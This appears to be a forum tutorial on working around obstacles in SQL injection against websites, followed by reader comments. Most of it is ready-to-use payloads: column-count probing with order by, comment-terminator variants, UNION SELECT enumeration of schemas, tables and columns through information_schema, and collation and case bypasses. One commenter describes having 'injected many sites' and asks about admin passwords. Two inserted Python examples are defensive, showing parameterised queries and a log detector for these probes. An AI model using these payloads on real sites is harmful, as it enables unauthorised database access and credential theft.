Some days ago I published a highly detailed post on SQL injection. Check the post from here.
When we perform SQL injection on a website, we run into many problems that are not familiar to us. Today I will show you some of these problems and their solutions.
OK, so here are some simple solutions to some simple SQL injection problems.
First: if "order by" is not working
So you have a vulnerable site:
Code: site.com/index.php?id=1
but the problem is that order by is not working.
You entered these commands:
Code: site.com/index.php?id=1 order by 1--
<< no error
Code: site.com/index.php?id=1 order by 5--
<< no error
Code: site.com/index.php?id=1 order by 100--
<< no error!
If you get this problem, then use string-based SQL injection and enter these commands:
Code:
site.com/index.php?id=1' order by 1--+-
<< no error
Code: site.com/index.php?id=1' order by 5--+-
<< no error
Code: site.com/index.php?id=1' order by 100--+-
<< error
(Note: you can see I have also put a single quote (') after the value (id=1'), so be careful about this.)
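Why the quote matters, seen from the application side (an added example, not code from this post): when the page pastes id between single quotes, the unquoted order by text stays inside the string literal and never reaches the SQL parser, so no column number can raise an error. SQLite stands in for the site's database so the sketch runs offline; the news table, its data and the function names are assumptions. The second function is the fix.

```python
import sqlite3

def make_db():
    # Constructed sample table standing in for the site's data (4 columns).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'text', 'admin')")
    return db

def vulnerable_lookup(db, raw_id):
    # Vulnerable pattern: the parameter is concatenated between single quotes.
    sql = "SELECT * FROM news WHERE id = '" + raw_id + "'"
    try:
        db.execute(sql).fetchall()
        return "no error"
    except sqlite3.Error as exc:
        return "error: " + str(exc)

def safe_lookup(db, raw_id):
    # Hardened form: accept only ASCII digits, then bind the value.
    # Anything else is treated as "no such row" and never reaches the parser.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return db.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("1 order by 100-- ", "1' order by 4-- ", "1' order by 100-- "):
        print(repr(probe), "->", vulnerable_lookup(db, probe), "| safe:", safe_lookup(db, probe))
```
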
* Sometimes you get problems when using order by, e.g.
Code: site.com/index.php?id=1 order by 100--
<< no error
or
Code: site.com/index.php?id=1 order by 1--
<< error
then try changing the query like this:
Code: site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*
Here are some more endings for the query, like:
Code:
-- -, --++-, -++--
* OK, while injecting a site, if you see that there are no useful tables
like (admin, auth, users, members, login) etc., then remember that every site has a different number of schemas
and there are different tables in every schema. You will get the schema names with this command:
Code:
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
and then the tables from a different schema using this:
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name>
Column names:
Code:
site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name>
Hope it will help you.
Most sites have a problem when you try to get table names, and they give a syntax error.
E.g. you used this command:
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
and it gives a syntax error like "you have error near at line.." blah blah.
In this situation you have to use different methods until you succeed.
I am writing down some of these commands:
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--
site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name))),4 from information_schema.tables limit 0,1
site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--
Hope it will help you.
* Sometimes while using "union select" you can get this error:
Code:
Illegal mix of collations
or something like this.
Then you should use this method:
Code:
site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--
Current user:
Code:
site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--
or
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--
unhex(hex()) is mostly used to bypass the illegal mix of collations error.
If it is still not working, then you should use this:
Code:
site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version)),4--
Hope it will help you.
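Every probe in this post leaves a recognisable request in the web server's access log. The following added example (not part of the original post) decodes request targets and flags the patterns shown above, including the mixed-case and `+`-encoded variants; the rule names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Patterns taken from the probes shown in this post; rule names are this example's own.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "charset_wrap": re.compile(r"\bunhex\s*\(\s*hex\s*\(|\bconvert\s*\(.+\busing\s+\w+"),
    "trailing_comment": re.compile(r"(--[\s+-]*|/\*)\s*$"),
}

def normalise(query):
    # Decode repeatedly (bounded) so double-encoded input is seen in clear,
    # lower-case so UnIoN SeLeCt matches, and collapse runs of whitespace.
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query.lower()).strip()

def classify(target):
    # Return the sorted names of all rules that fire on the query string.
    query = normalise(urlsplit(target).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def scan(targets):
    # Map each suspicious request target to the rules it triggered.
    hits = {}
    for target in targets:
        found = classify(target)
        if found:
            hits[target] = found
    return hits

# Constructed request targets, as they would appear in an access log.
SAMPLES = [
    "/index.php?id=1",
    "/index.php?id=1%27%20order%20by%20100--+-",
    "/index.php?id=1%20UnIoN%20SeLeCt%201,2,unhex(hex(@@version)),4--",
    "/index.php?id=1+union+select+1,2,group_concat(table_name),4"
    "+from+information_schema.tables+limit+0,1--",
    "/search.php?q=order+by+price",
]

if __name__ == "__main__":
    for target, rules in scan(SAMPLES).items():
        print(rules, target)
```

A burst of order_by_probe hits with rising numbers against one parameter, followed by union_select, is the column-counting sequence described above and is worth alerting on even when each single request returns HTTP 200.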
Why if there's no error with 'order by 1--' but there's one with 'order by 2--'?
Then the column number is one..
But there's an error with 'union all select 1--'
Brother..
I have injected many sites. But now I find some sites where the admin id password is not working. What can I do?? :(